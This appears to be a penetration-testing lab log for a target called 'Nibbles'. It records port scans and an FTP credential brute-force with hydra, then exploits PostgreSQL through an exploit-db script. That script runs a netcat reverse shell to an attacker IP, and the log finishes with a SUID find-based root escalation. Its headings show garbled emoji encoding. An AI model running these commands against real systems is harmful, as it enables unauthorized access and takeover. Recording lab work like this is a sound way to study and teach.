Nibbles

๐Ÿงช Pentest Log: {{date:2025-08-09}}

๐Ÿ” Target Information

ip=192.168.223.47

๐Ÿ“ก Enumeration

๐Ÿ”Œ Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 21

Anonymous Login

ftp anonymous@$ip

Bruteforce Common Credentials

hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -6 ftp://$ip

Port 22

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

feroxbuster --url http://$ip

wpscan --url http://$ip

dirsearch -u http://$ip -r -o dirsearch.txt

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://$ip$/ -H "Host: FUZZ.website.com"

nikto -h http://$ip


curl -s http://$ip/ | html2markdown

Port 5437

PostgreSQL DB 11.3 - 11.9

Google for "PostgreSQL DB 11.3 - 11.9 exploit", found

https://www.exploit-db.com/exploits/50847

๐Ÿ’ฃ Exploitation

๐Ÿ“Œ Vulnerability Summary

๐Ÿš€ Exploit Execution

๐Ÿ”ง Exploit Method

Tool / Script Used:

https://www.exploit-db.com/exploits/50847

python3 50847.py -i $ip -p 5437 -c "busybox nc 192.168.45.163 5437 -e /bin/bash"

nc -lvnp 5437

๐Ÿงฌ Privilege Escalation

๐Ÿ‘ค Current Access

๐Ÿ” Enumeration

SUID:

find / -type f -perm -4000 2>/dev/null

found /usr/bin/find

๐Ÿ”“ Privilege Escalation Exploit

๐Ÿ“Œ Exploit Summary

๐Ÿ”ง Exploit Steps

find . -exec /bin/sh -p \; -quit